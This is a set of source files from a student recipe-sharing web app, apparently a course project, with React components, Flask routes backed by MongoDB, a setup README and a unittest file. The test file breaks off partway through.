therodesun/recipes.io | https://github.com/therodesun/recipes.io | 4c3f0cf51656c99e681076c615cab3af7d6dab9d | aa66dfe604db130b904b7d30ea5c801ac62cee22 | e2e0f5a4037656126a1fb06e8a556a5c318fb005 | refs/heads/main | 2023-04-06T03:26:17.769304 | 2021-03-16T00:31:13 | 2021-03-16T00:31:13 | 335,783,658 | 1 | 0 | null | 2021-02-03T23:31:28 | 2021-03-06T10:41:25 | 2021-03-06T10:42:58 | Python |
[
{
"alpha_fraction": 0.5808709263801575,
"alphanum_fraction": 0.5867029428482056,
"avg_line_length": 33.2933349609375,
"blob_id": "38ee1aef0eb7311305d7ca400b9d48da8004ed5e",
"content_id": "1bd1ecea45cd272927a23ed2ed54dc0b7629e3a0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2572,
"license_type": "no_license",
"max_line_length": 231,
"num_lines": 75,
"path": "/backend/model.py",
"repo_name": "therodesun/recipes.io",
"src_encoding": "UTF-8",
"text": "import pymongo\nfrom bson import ObjectId\n\nclass Model(dict):\n \"\"\"\n A simple model that wraps mongodb document\n \"\"\"\n __getattr__ = dict.get\n __delattr__ = dict.__delitem__\n __setattr__ = dict.__setitem__\n\n def save(self):\n if not self._id:\n self.collection.insert_one(self)\n self._id = str(self._id)\n\n\nclass Recipe(Model):\n db_client = pymongo.MongoClient('localhost', 27017) #change if your db is in another host and port\n collection = db_client['users'][\"recipes\"]\n \n def find_all(self):\n recipes = list(self.collection.find())\n for recipe in recipes:\n recipe[\"_id\"] = str(recipe[\"_id\"])\n return recipes\n \n def find_name(self, name):\n recipes = list(self.collection.find({\"name\":name}))\n for recipe in recipes: \n recipe[\"_id\"] = str(recipe[\"_id\"])\n return recipe\n \n def clearAll(self):\n for recipe in list(self.collection.find()):\n resp = self.collection.delete_one({\"_id\": recipe[\"_id\"]})\n return resp\n \n def update(self, recipe):\n return self.collection.update_one({'name' : recipe['name']}, { '$set': { 'name' : recipe['name'], 'ingredients' : recipe['ingredients'], 'steps' : recipe['steps'], 'time': recipe['time'], 'imageURL' : recipe['imageURL'] }})\n \n def deleteby_name(self, name):\n return self.collection.delete_one({'name' : name})\n\nclass Shopping(Model):\n db_client = pymongo.MongoClient('localhost', 27017) #change if your db is in another host and port\n collection = db_client['users'][\"shopping\"]\n \n def find_all(self):\n ingredients = list(self.collection.find())\n for ingredient in ingredients:\n ingredient[\"_id\"] = str(ingredient[\"_id\"])\n return ingredients\n \n def clearAll(self):\n resp = None\n for ingredient in list(self.collection.find()):\n resp = self.collection.delete_one({\"_id\": ingredient[\"_id\"]})\n return resp\n\nclass MyRecipes(Model):\n db_client = pymongo.MongoClient('localhost', 27017) #change if your db is in another host and port\n collection = db_client['users'][\"myrecipes\"]\n \n def find_all(self):\n recipes = list(self.collection.find())\n for recipe in recipes:\n recipe[\"_id\"] = str(recipe[\"_id\"])\n return recipes\n\n def clearAll(self):\n resp = None\n for recipe in list(self.collection.find()):\n resp = self.collection.delete_one({\"_id\": recipe[\"_id\"]})\n return resp\n"
},
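Editor's note: a minimal usage sketch of the Model/Recipe wrapper above: attribute access maps onto dict keys, and save() inserts once and then stringifies _id (pymongo's insert_one writes the generated ObjectId back into the passed dict). Assumes a MongoDB instance on localhost:27017, as hard-coded in the class, and that the module is importable as `model`.

```python
from model import Recipe

recipe = Recipe({
    "name": "pancakes",
    "ingredients": ["flour", "eggs", "milk"],
    "steps": ["mix", "fry"],
    "time": "20 min",
    "imageURL": "",
})
recipe.save()                        # inserts because recipe._id is falsy
print(recipe._id)                    # stringified ObjectId
print(Recipe().find_name("pancakes"))  # the stored document, or None
```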
{
"alpha_fraction": 0.5059612393379211,
"alphanum_fraction": 0.5136612057685852,
"avg_line_length": 26.387754440307617,
"blob_id": "e96c29ada088b6bb8a67cac4e5cdbc2a26d5c364",
"content_id": "e4fdf9816f19cce311d2deb0f7df4eae812781a6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 4026,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 147,
"path": "/ui/src/AddRecipe/AddRecipe.js",
"repo_name": "therodesun/recipes.io",
"src_encoding": "UTF-8",
"text": "import React, { Component } from 'react';\nimport Table from './Table';\nimport Form from './Form';\nimport Table2 from './Table2';\nimport Form2 from './Form2';\nimport axios from \"axios\";\n\nclass AddRecipe extends Component {\n\n // submit recipe\n makePostCall(recipe){\n const { name } = this.state;\n return axios.post('http://localhost:5000/recipes', recipe)\n .then(function (response) {\n console.log(response);\n if (response.status === 201) {\n sendName(name);\n } else {\n return false;\n }\n })\n .catch(function (error) {\n console.log(error);\n return false;\n });\n }\n\n initialState = {\n ingredients: [],\n steps: [],\n name: \"\",\n time: \"\",\n imageURL: \"\",\n response:true,\n }\n \n state = this.initialState\n\n handleChange = event => {\n const { name, value } = event.target\n\n this.setState({\n [name]: value,\n })\n }\n\n removeInstruction = index => {\n const { steps } = this.state\n\n this.setState({\n steps: steps.filter((instruction, i) => {\n return i !== index\n }),\n })\n }\n \n removeIngredient = index => {\n const { ingredients } = this.state\n\n this.setState({\n ingredients: ingredients.filter((ingredient, i) => {\n return i !== index\n }),\n })\n }\n\n // submit ingredients\n handleSubmit = ingredient => {\n this.setState({ ingredients: [...this.state.ingredients, ingredient] });\n }\n \n // submit instructions\n handleSubmit2 = instruction => {\n this.setState({ steps: [...this.state.steps, instruction.step] });\n }\n \n // submit recipe changes\n handleSubmit3 = () => {\n this.makePostCall(this.state);\n }\n\n // delete ingredient\n handleDelete = (ingredient, index) => {\n this.removeIngredient(index);\n }\n \n // delete instruction\n handleDelete2 = (instruction, index) => {\n this.removeInstruction(index);\n }\n\n render() {\n const { ingredients, steps, name, time, imageURL } = this.state\n\n return (\n <div className=\"container\">\n <form>\n <label htmlFor=\"ingredient\">Recipe Name</label>\n <input\n type=\"text\"\n name=\"name\"\n id=\"name\"\n value={name}\n onChange={this.handleChange} />\n <label htmlFor=\"amount\">Duration</label>\n <input\n type=\"text\"\n name=\"time\"\n id=\"time\"\n value={time}\n onChange={this.handleChange} />\n <label htmlFor=\"imageURL\">Image Link</label>\n <input\n type=\"text\"\n name=\"imageURL\"\n id=\"imageURL\"\n value={imageURL}\n onChange={this.handleChange} />\n </form>\n <h3>Ingredients</h3>\n <Table ingredientData={ingredients} remove={this.handleDelete} />\n <Form handleSubmit={this.handleSubmit} />\n <h3>Instructions</h3>\n <Table2 instructionData={steps} remove={this.handleDelete2} />\n <Form2 handleSubmit={this.handleSubmit2} />\n <button id=\"cancelButton\">Cancel</button>\n <button id=\"submitButton\" onClick={this.handleSubmit3}>Submit</button>\n </div>\n )\n }\n}\n\n// load recipe in database cache for recipe page\nfunction sendName(name) {\n const nameURL = encodeURIComponent(name);\n axios.get('http://localhost:5000/recipes/' + nameURL)\n .then(res => {\n console.log(\"success\");\n window.location.href = \"http://localhost:3000/RecipePage\";\n })\n .catch(function (error) {\n //Not handling the error. Just logging into the console.\n console.log(error);\n });\n}\n\nexport default AddRecipe\n"
},
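Editor's note: AddRecipe.js POSTs the recipe JSON to http://localhost:5000/recipes (expecting a 201) and then GETs /recipes/<name>, while Carousel.js below expects GET /recipes to return {"recipes_list": [...]}. A minimal sketch of what the matching Flask endpoints could look like on the backend the README describes (Flask + flask-cors + the pymongo Recipe model); the route shapes mirror the axios URLs, everything else is an assumption.

```python
from flask import Flask, jsonify, request
from flask_cors import CORS

from model import Recipe

app = Flask(__name__)
CORS(app)  # lets the React dev server on :3000 call this API


@app.route('/recipes', methods=['GET', 'POST'])
def recipes():
    if request.method == 'POST':
        recipe = Recipe(request.get_json())
        recipe.save()  # save() stringifies _id, so the dict is JSON-safe
        return jsonify(recipe), 201  # AddRecipe.js checks for status 201
    return jsonify({'recipes_list': Recipe().find_all()})


@app.route('/recipes/<name>')
def recipe_by_name(name):
    return jsonify(Recipe().find_name(name))
```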
{
"alpha_fraction": 0.4743150770664215,
"alphanum_fraction": 0.4743150770664215,
"avg_line_length": 24.434782028198242,
"blob_id": "c3d4e2f18c79aae69e70d701e0b03043ad51c814",
"content_id": "a09bffbb7f5eae499ce1ef502247e9d02423f299",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 584,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 23,
"path": "/ui/src/Home/Search.js",
"repo_name": "therodesun/recipes.io",
"src_encoding": "UTF-8",
"text": "import React, { Component } from 'react';\n\nclass Search extends Component {\n state = { }\n render() { \n return ( \n <form action=\"RecipeTable/\" method=\"get\">\n <label id=\"searchTitle\" for=\"header-search\">\n Search Recipes\n </label>\n <input\n type=\"text\"\n id=\"header-search\"\n name=\"s\"\n placeholder=\"Enter Recipe Name\"\n />\n <button type=\"submit\" id=\"searchSubmit\">Search</button>\n </form> \n );\n }\n}\n \nexport default Search;"
},
{
"alpha_fraction": 0.763805091381073,
"alphanum_fraction": 0.780510425567627,
"avg_line_length": 43.89583206176758,
"blob_id": "7a2e557e13728d2e37713b4c8ac61ded4364d72b",
"content_id": "c4522d5e7f877fa02d57f2a3186a2729b7f2cd0d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2155,
"license_type": "no_license",
"max_line_length": 550,
"num_lines": 48,
"path": "/README.md",
"repo_name": "therodesun/recipes.io",
"src_encoding": "UTF-8",
"text": "# recipes.io\nCSC307 Project\n\nreci.p is an app designed to store recipes that users have created. On the app users can add their own recipes to a database, and then search through the database to find recipes. Users can view all recipes in a table page, where an image, name, and the time to make the recipe are displayed. By clicking on these recipes, users are taken to recipe pages, where they can view the ingredients and instructions to create the dish. Users can also click on a button to add all the ingredients to a shopping cart, where they can view what they need to buy\n\nProject CI Page: https://travis-ci.com/github/therodesun/recipes.io\n\n**Diagrams**\n\nUI Prototype: https://www.figma.com/file/KyD6pFxzOh6RtUUyBgult2/Reci.P?node-id=0%3A1 Last Updated: 2/3/21\n\nUML Use Diagram: https://app.diagrams.net/#G1k5-pMzCaIBLEzz-6L6kYaYBWmw1fH75a Last Updated: 3/8/21\n\nUML Class Diagram: https://app.diagrams.net/#G16uo9sK-sCjnR-Nszxf3Au21kKtAxGJUk Last Updated: 2/8/21\n\n**Linters**\n\nPycodestyle - in command line, execute the following command: pip install pycodestyle\n\nPrettier - open extensions tab in VS Code and search \"Prettier,\" install the first result\n\n**Development Environment Setup**\n\nFront end: Install npm/node.js https://nodejs.org/en/download/\n\nBack end: Install python's flask library https://flask.palletsprojects.com/en/1.1.x/installation/\n\nConnecting the front and back: Install the javascript axios library by running the command 'npm install axios' in the front end folder. Additioanlly, install the flask-cors library in the back end folder by running the command 'pip install flask-cors'\n\nDatabase: Install MongoDB. Windows: https://docs.mongodb.com/manual/tutorial/install-mongodb-on-windows/ Mac: https://github.com/mongodb/homebrew-brew Linux: https://docs.mongodb.com/manual/administration/install-on-linux/\n\nIn order to connect the database with the backend, install pymongo in the python virtual environment of the backend by running 'pip install pymongo' in command line\n\n**To run the project**\n\nFront end: \n\n* cd /recipes.io/ui\n\n* npm start\n\nBack end:\n\n* cd /recipes.io/backend\n\n* export FLASK_APP=recipe.py\n\n* flask run\n"
},
{
"alpha_fraction": 0.4855305552482605,
"alphanum_fraction": 0.5100482106208801,
"avg_line_length": 34.55714416503906,
"blob_id": "ef18fe8c014ccfe33bab20edcad86973da6bbd48",
"content_id": "2f903876f59cb4d71fbc34182c63f044289b9c6c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 2488,
"license_type": "no_license",
"max_line_length": 177,
"num_lines": 70,
"path": "/ui/src/Home/Carousel.js",
"repo_name": "therodesun/recipes.io",
"src_encoding": "UTF-8",
"text": "import React, { Component } from 'react';\nimport { Button } from 'react-bootstrap';\nimport history from './../history';\nimport axios from 'axios'\n\nfunction sendName(name) {\n const nameURL = encodeURIComponent(name);\n axios.get('http://localhost:5000/recipes/' + nameURL)\n .then(res => {\n console.log(\"success\");\n window.location.href = \"http://localhost:3000/RecipePage\";\n })\n .catch(function (error) {\n //Not handling the error. Just logging into the console.\n console.log(error);\n });\n}\n\nclass Carousel extends Component {\n state = {\n recipes: [],\n response:false\n }\n componentDidMount() {\n axios.get('http://localhost:5000/recipes')\n .then(res => {\n const recipes = res.data.recipes_list;\n this.setState({ recipes: recipes, response: true });\n })\n .catch(function (error) {console.log(error);}\n );\n }\n\n render() { \n if (!(this.state.response)){\n return <div id=\"loadingbar\">No Recipes to Display</div>\n }\n const {recipes} = this.state;\n // get two random indices\n var rand1 = Math.floor(Math.random() * (recipes.length));\n var rand2 = Math.floor(Math.random() * (recipes.length));\n if (rand1 == rand2) {\n // prevent duplicate index\n if (rand1 + 1 < recipes.length) {\n rand1 = rand1 + 1;\n } else if (rand1 - 1 >= 0) {\n rand1 = rand1 - 1;\n }\n }\n return ( \n <div>\n <h2 id = \"recommend\">\n Recommended Recipes\n </h2>\n <Button id=\"carousel1\" variant=\"btn btn-success\" onClick={() => sendName(recipes[rand1].name)}>\n <div id = \"carousel\">\n <img class = \"class\" alt = 'https://c.ndtvimg.com/2020-01/n7thfo2o_spaghetti_625x300_28_January_20.jpg' src = {recipes[rand1].imageURL} id=\"image\"></img>\n </div>\n </Button>\n <Button id=\"carousel2\" variant=\"btn btn-success\" onClick={() => sendName(recipes[rand2].name)}>\n <div id = \"carousel\">\n <img class = \"class\" alt = 'https://static.toiimg.com/photo/53110049.cms' src = {recipes[rand2].imageURL} id=\"image\"></img>\n </div>\n </Button>\n </div>\n );\n }\n}\n \nexport default Carousel;"
},
{
"alpha_fraction": 0.49494948983192444,
"alphanum_fraction": 0.4983164966106415,
"avg_line_length": 19.517240524291992,
"blob_id": "511d65f48719b1b8a6f94aee35bfaa954df695b2",
"content_id": "0ae9ffd09342d049d0e0b100a575265546de0185",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 594,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 29,
"path": "/ui/src/Home/Home.js",
"repo_name": "therodesun/recipes.io",
"src_encoding": "UTF-8",
"text": "import React, { Component } from \"react\";\nimport \"./Home.css\";\nimport Search from \"./Search.js\"\nimport Carousel from \"./Carousel.js\"\nimport img from \"./recipe.png\"\nexport default class Home extends Component {\n \n render() {\n \n return (\n <div className=\"Home\">\n <div className=\"lander\">\n <h1 id=\"titleRecip\">Welcome to Reci.p!</h1>\n <Search/>\n <Carousel/>\n </div>\n <div id = \"logoImagediv\">\n <img \n id=\"imageLogo\"\n src= {img} \n alt=\"new\"\n />\n </div>\n \n </div>\n \n );\n }\n}"
},
{
"alpha_fraction": 0.5099760293960571,
"alphanum_fraction": 0.5163607597351074,
"avg_line_length": 25.10416603088379,
"blob_id": "c7584566dc312f43ffe02cf1085c0458e5b45c4a",
"content_id": "6bf05b5e3f9c937d067c90ca9fd369b3f56a3c77",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 1253,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 48,
"path": "/ui/src/TablePage/TablePage.js",
"repo_name": "therodesun/recipes.io",
"src_encoding": "UTF-8",
"text": "import React, { Component } from 'react';\nimport Table from './RecipeTable';\nimport './index.css'\nimport axios from \"axios\";\n\nclass TablePage extends Component {\n state = {\n recipes: [],\n }\n \n // get all recipes\n componentDidMount() {\n axios.get('http://localhost:5000/recipes')\n .then(res => {\n const recipes = res.data.recipes_list;\n this.setState({ recipes });\n })\n .catch(function (error) {\n //Not handling the error. Just logging into the console.\n console.log(error);\n });\n }\n render() {\n const {recipes} = this.state\n const param = new URLSearchParams(window.location.search).get('s');\n if (param != null) {\n return (\n <div className=\"container\">\n <h1>Recipe Table</h1>\n <Table recipeData = {recipes.filter(function(recipe) {\n return recipe[\"name\"].toLowerCase().includes(param.toLowerCase());\n })} />\n </div>\n )\n } else {\n return (\n <div className=\"container\">\n <h1>Recipe Table</h1>\n <Table recipeData = {recipes} />\n </div>\n )\n }\n };\n \n}\n\n\nexport default TablePage\n"
},
{
"alpha_fraction": 0.5946717262268066,
"alphanum_fraction": 0.5946717262268066,
"avg_line_length": 37.925926208496094,
"blob_id": "6589b42b34b72a9eb2144830cf412b7726229ead",
"content_id": "a64457439fe7c2659555381e7cd5e3bf548b76aa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 1051,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 27,
"path": "/ui/src/Routes.js",
"repo_name": "therodesun/recipes.io",
"src_encoding": "UTF-8",
"text": "import React, { Component } from \"react\";\nimport { Router, Switch, Route } from \"react-router-dom\";\n\nimport TablePage from \"./TablePage/TablePage\";\nimport Home from \"./Home/Home\";\nimport history from './history';\nimport RecipePage from './RecipePage/RecipePage';\nimport ShoppingCart from './ShoppingCart/ShoppingCart';\nimport AddRecipe from './AddRecipe/AddRecipe';\nimport EditRecipe from './RecipePage/EditRecipe';\n\nexport default class Routes extends Component {\n render() {\n return (\n <Router history={history}>\n <Switch>\n <Route path=\"/\" exact component={Home} />\n <Route path=\"/RecipeTable\" component={TablePage} />\n <Route path=\"/RecipePage\" component={RecipePage} />\n <Route path=\"/ShoppingCart\" component={ShoppingCart} />\n <Route path=\"/AddRecipe\" component={AddRecipe} />\n <Route path=\"/EditRecipe\" component={EditRecipe} />\n </Switch>\n </Router>\n )\n }\n}\n"
},
{
"alpha_fraction": 0.6091954112052917,
"alphanum_fraction": 0.6120689511299133,
"avg_line_length": 21.45161247253418,
"blob_id": "c4f14929b32d665f8450ea195a7106a9b6ab9e1f",
"content_id": "7e2b0fb5529f26c1883631a884d08a7077519ef8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 696,
"license_type": "no_license",
"max_line_length": 112,
"num_lines": 31,
"path": "/ui/src/RecipePage/InstructionsList.js",
"repo_name": "therodesun/recipes.io",
"src_encoding": "UTF-8",
"text": "import React, { Component } from 'react'\n\nconst ListBody2 = props => {\n const rows = props.recipeData.map((row, index) => {\n return (\n <li key={index}>{row}</li>\n )\n })\n\n return <ol id=\"instr_list\">{rows}</ol>\n}\n\nclass InstructionsList extends Component {\n render() {\n // Should temporarily be a fixed list on front end\n const { recipeData } = this.props // Using recipeData as variable name to pass through data from databases\n\n return (\n <ListBody2 recipeData = {recipeData} />\n )\n }\n}\n\nexport default InstructionsList\n\n// Put in display page\n// return (\n// <div className=\"container\">\n// <Table recipeData={recipes} />\n// </div>\n//)\n"
},
{
"alpha_fraction": 0.5941481590270996,
"alphanum_fraction": 0.6106653809547424,
"avg_line_length": 31.3435115814209,
"blob_id": "cd1a2897e5721d84755208c52c340943186ce94b",
"content_id": "bd3b735a3dfd3a2e29727528b9d2d6f9dd5b599f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4238,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 131,
"path": "/backend/recipe.py",
"repo_name": "therodesun/recipes.io",
"src_encoding": "UTF-8",
"text": "\nfrom flask import Flask\nfrom flask import request\nfrom flask import jsonify\nimport json\n# for linking frontend-backend\nfrom flask_cors import CORS\n\n# for random ids \n# import random \n# import string\n\n# for mongo db\nfrom model import Recipe\nfrom model import Shopping\nfrom model import MyRecipes\n\n\napp = Flask(__name__)\n#CORS stands for Cross Origin Requests.\n#Here we'll allow requests coming from any domain. Not recommended for production environment.\nCORS(app)\n\n# create list \nrecipe = {\n 'recipes_list':[]\n}\n\n\nshopping = {\n 'ingredients':[]\n}\n\nmyrecipes = {\n 'recipes':[]\n}\n\ncurrentRecipe = None\n\[email protected]('/recipes', methods=['GET', 'POST', 'DELETE'])\ndef get_recipes():\n if request.method == 'GET':\n recipes = Recipe().find_all()\n if recipes is not None and len(recipes) > 0:\n return jsonify({\"recipes_list\": recipes}), 200\n return jsonify({\"error\": \"recipe not found\"}), 404\n elif request.method == 'POST':\n recipeToAdd = request.get_json()\n newRecipe = Recipe(recipeToAdd)\n newRecipe.save()\n if \"name\" in recipeToAdd:\n resp = jsonify(newRecipe), 201\n else:\n resp = jsonify({\"error\": \"something went wrong\"}), 400\n return resp\n elif request.method == 'DELETE':\n Recipe().clearAll()\n return jsonify({\"success\":\"entries cleared\"}), 200\n\n# implement search by recipe name \[email protected]('/recipes/<name>', methods=['GET', 'DELETE'])\ndef get_recipes_name(name):\n if request.method == 'GET':\n recipe = Recipe().find_name(name)\n if recipe is not None and len(recipe) != 1:\n global currentRecipe\n currentRecipe = recipe\n resp = jsonify({\"success\":\"recipe loaded into cache\"}), 200\n return resp\n else:\n return jsonify({\"error\":\"recipe not found\"}), 404\n if request.method == 'DELETE':\n Recipe().deleteby_name(name)\n resp = jsonify({\"success\":\"recipe delete\"}), 200\n return resp\n\[email protected]('/recipe', methods=['GET'])\ndef get_current():\n global currentRecipe\n if currentRecipe is not None:\n return jsonify(currentRecipe), 200\n return jsonify({\"error\":\"recipe not found\"}), 404\n\[email protected]('/myrecipes', methods=['GET', 'POST', 'DELETE'])\ndef get_myrecipes():\n if request.method == 'GET':\n recipes = MyRecipes().find_all()\n if recipes is not None and len(recipes) > 0:\n return jsonify({\"recipes_list\": recipes}), 200\n else:\n return jsonify({\"error\":\"recipes not found\"}), 404\n elif request.method == 'POST':\n recipeToAdd = request.get_json()\n if \"name\" not in recipeToAdd:\n resp = jsonify({\"error\": \"something went wrong\"}), 400\n return resp\n newRecipe = MyRecipes(recipeToAdd)\n newRecipe.save()\n resp = jsonify(newRecipe), 201\n return resp\n elif request.method == 'DELETE':\n MyRecipes().clearAll()\n return jsonify({\"success\":\"entries cleared\"}), 200\n\[email protected]('/shopping', methods=['GET', 'POST', 'DELETE'])\ndef get_ingredients():\n if request.method == 'GET':\n ingredients = Shopping().find_all()\n if ingredients is not None and len(ingredients) > 0:\n return jsonify({\"ingredients\": ingredients}), 200\n else:\n return jsonify({\"error\":\"ingredients not found\"}), 404\n elif request.method == 'POST':\n temp = request.get_json()\n if \"ingredients\" in temp:\n ingredientsToAdd = temp[\"ingredients\"]\n for ingredient in ingredientsToAdd:\n newRecipe = Shopping(ingredient)\n newRecipe.save()\n return jsonify({\"success\":\"ingredients added\"}), 201\n return jsonify({\"error\": \"something went wrong\"}), 400\n elif request.method == 'DELETE':\n 
Shopping().clearAll()\n return jsonify({\"success\":\"entries cleared\"}), 200\n \[email protected]('/update', methods=['POST'])\ndef update_recipe():\n recipe = request.get_json()\n if recipe is not None and \"name\" in recipe:\n newRecipe = Recipe().update(recipe)\n return jsonify({\"success\":\"recipe updated\"}), 201\n return jsonify({\"error\":\"recipe not updated\"}), 400\n"
},
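The Flask routes in backend/recipe.py above import `Recipe`, `Shopping`, and `MyRecipes` from a `model` module that is not included in this dump. Purely as an illustration — every class and method name below is inferred from the calls recipe.py actually makes, and the pymongo wiring is an assumption based on the README's MongoDB setup notes — that module could look roughly like this:

```python
# Hypothetical sketch of backend/model.py (NOT the project's actual file).
# Interface inferred from recipe.py: find_all/save/clearAll on all three
# classes, plus find_name/deleteby_name/update on Recipe. Database and
# collection names are made up for the example.
from pymongo import MongoClient

client = MongoClient("localhost", 27017)  # assumed local MongoDB per the README
db = client.recipes_io                    # hypothetical database name


class _Document(dict):
    # Subclassing dict keeps jsonify(newRecipe) in recipe.py serializable.
    collection = None  # bound by each subclass

    def __init__(self, document=None):
        super().__init__(document or {})

    def save(self):
        # insert_one mutates the dict it receives (it adds an ObjectId _id),
        # so insert a copy to keep this object JSON-serializable afterwards
        self.collection.insert_one(dict(self))

    def find_all(self):
        return list(self.collection.find({}, {"_id": 0}))

    def clearAll(self):
        self.collection.delete_many({})


class Recipe(_Document):
    collection = db.recipes

    def find_name(self, name):
        return self.collection.find_one({"name": name}, {"_id": 0})

    def deleteby_name(self, name):
        self.collection.delete_one({"name": name})

    def update(self, recipe):
        return self.collection.replace_one({"name": recipe["name"]}, recipe)


class MyRecipes(_Document):
    collection = db.myrecipes


class Shopping(_Document):
    collection = db.shopping
```

With a shape like this, `/recipes/<name>` can cache the found document and `/recipe` can return it with `jsonify` directly.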
{
"alpha_fraction": 0.5488215684890747,
"alphanum_fraction": 0.5675504803657532,
"avg_line_length": 41.04867172241211,
"blob_id": "dbf1c4a70ad62cd185fc55c86d6e1f5b93289faf",
"content_id": "cd184df57830089f3c73551f11ca21aadd8312bb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9504,
"license_type": "no_license",
"max_line_length": 211,
"num_lines": 226,
"path": "/backend/testing.py",
"repo_name": "therodesun/recipes.io",
"src_encoding": "UTF-8",
"text": "import unittest\nfrom flask import json\nimport flask_unittest\nfrom recipe import app\n\nclass TestStringMethods(unittest.TestCase):\n # clear for first test to prep for others\n def test1_clear(self):\n tester = app.test_client(self)\n tester.delete('/shopping')\n tester.delete('/myrecipes')\n tester.delete('/recipes')\n \n def test1_recipe_get_fail(self):\n tester = app.test_client(self)\n response = tester.get('/recipes')\n self.assertEqual(response.status_code,404)\n \n def test1_get_recipe_cached_fail(self):\n tester = app.test_client(self)\n response = tester.get('/recipe')\n self.assertEqual(response.status_code, 404)\n \n # test for post recipe list \n def test2_add_recipe(self):\n tester = app.test_client(self)\n response = tester.post('/recipes',json={\n \"name\": \"Roasted Asparagus\",\n \"time\": \"40 minutes\",\n \"ingredients\": [\n {\n \"quantity\": \"1 lb\",\n \"name\": \" asparagus\"\n },\n {\n \"quantity\": \"1 1/2 tbsp\",\n \"name\": \"olive oil\"\n },\n {\n \"quantity\": \"1/2 tsp\",\n \"name\": \"kosher salt\"\n }\n ],\n \"steps\": [\n \"Preheat oven to 4258F.\",\n \"Cut off the woody bottom part of the asparagus spears and discard.\",\n \"With a vegetable peeler, peel off the skin on the bottom 2-3 inches of the spears (this keeps the asparagus from being all.\\\",string.\\\", and if you eat asparagus you know what I mean by that).\",\n \"Place asparagus on foil-lined baking sheet and drizzle with olive oil.\",\n \"Sprinkle with salt.\",\n \"With your hands, roll the asparagus around until they are evenly coated with oil and salt.\",\n \"Roast for 10-15 minutes, depending on the thickness of your stalks and how tender you like them.\",\n \"They should be tender when pierced with the tip of a knife.\",\n \"The tips of the spears will get very brown but watch them to prevent burning.\",\n \"They are great plain, but sometimes I serve them with a light vinaigrette if we need something acidic to balance out our meal.\"\n ],\n \"imageURL\": \"http://img.sndimg.com/food/image/upload/w_266/v1/img/recipes/50/84/7/picMcSyVd.jpg\",\n \"originalURL\": \"http://www.food.com/recipe/roasted-asparagus-50847\",\n \"response\":\"true\"\n }, content_type='application/json',\n follow_redirects=True)\n self.assertEqual(response.status_code,201)\n json_response = json.loads(response.get_data(as_text=True))\n \n def test2_add_recipe_fail(self):\n tester = app.test_client(self)\n response = tester.post('/recipes',json={}, content_type='application/json',\n follow_redirects=True)\n self.assertEqual(response.status_code,400)\n\n # test for printing recipes list\n def test2_show_recipes(self):\n tester = app.test_client(self)\n response = tester.get('/recipes')\n self.assertEqual(response.status_code,200)\n\n # Testing if get returns the right page\n # need to post the data first\n def test2_find_recipe(self):\n tester = app.test_client(self)\n response = tester.get('/recipes/Roasted%20Asparagus')\n self.assertEqual(response.status_code, 200)\n json_response = json.loads(response.get_data(as_text=True))\n \n def test2_get_recipe_cached(self):\n tester = app.test_client(self)\n response = tester.get('/recipe')\n self.assertEqual(response.status_code, 200)\n\n # Testing proper error code \n def test2_no_Recipe(self):\n tester = app.test_client(self)\n response = tester.get('/recipes/nonexistentrecipe1213123123123')\n self.assertEqual(response.status_code, 404)\n\n # Testing update recipe\n def test3_update(self):\n tester = app.test_client(self)\n response = tester.post('/update', 
json={\n \"name\": \"Roasted Asparagus\",\n \"time\": \"30 minutes\",\n \"ingredients\": [\n {\n \"quantity\": \"1 lb\",\n \"name\": \" asparagus\"\n },\n {\n \"quantity\": \"1 1/2 tbsp\",\n \"name\": \"olive oil\"\n },\n {\n \"quantity\": \"1/2 tsp\",\n \"name\": \"kosher salt\"\n }\n ],\n \"steps\": [\n \"Preheat oven to 4258F.\",\n \"Cut off the woody bottom part of the asparagus spears and discard.\",\n \"With a vegetable peeler, peel off the skin on the bottom 2-3 inches of the spears (this keeps the asparagus from being all.\\\",string.\\\", and if you eat asparagus you know what I mean by that).\",\n \"Place asparagus on foil-lined baking sheet and drizzle with olive oil.\",\n \"Sprinkle with salt.\",\n \"With your hands, roll the asparagus around until they are evenly coated with oil and salt.\",\n \"Roast for 10-15 minutes, depending on the thickness of your stalks and how tender you like them.\",\n \"They should be tender when pierced with the tip of a knife.\",\n \"The tips of the spears will get very brown but watch them to prevent burning.\",\n \"They are great plain, but sometimes I serve them with a light vinaigrette if we need something acidic to balance out our meal.\"\n ],\n \"imageURL\": \"http://img.sndimg.com/food/image/upload/w_266/v1/img/recipes/50/84/7/picMcSyVd.jpg\",\n \"originalURL\": \"http://www.food.com/recipe/roasted-asparagus-50847\",\n \"response\":\"true\"\n })\n self.assertEqual(response.status_code, 201)\n\n # Testing update recipe error\n def test3_update_fail(self):\n tester = app.test_client(self)\n response = tester.post('/update', json={})\n self.assertEqual(response.status_code, 400)\n \n # test when we return empty myrecipes \n def test3_myrecipe_get_fail(self):\n tester = app.test_client(self)\n response = tester.get('/myrecipes')\n self.assertEqual(response.status_code,404)\n \n def test4_myrecipe_post(self):\n tester = app.test_client(self)\n response = tester.post('/myrecipes',json={\"name\":\"egg\",\"time\":\"15 min\"}, content_type='application/json',\n follow_redirects=True)\n self.assertEqual(response.status_code,201)\n \n def test4_myrecipe_post_fail(self):\n tester = app.test_client(self)\n response = tester.post('/myrecipes',json={}, content_type='application/json',\n follow_redirects=True)\n self.assertEqual(response.status_code,400)\n \n 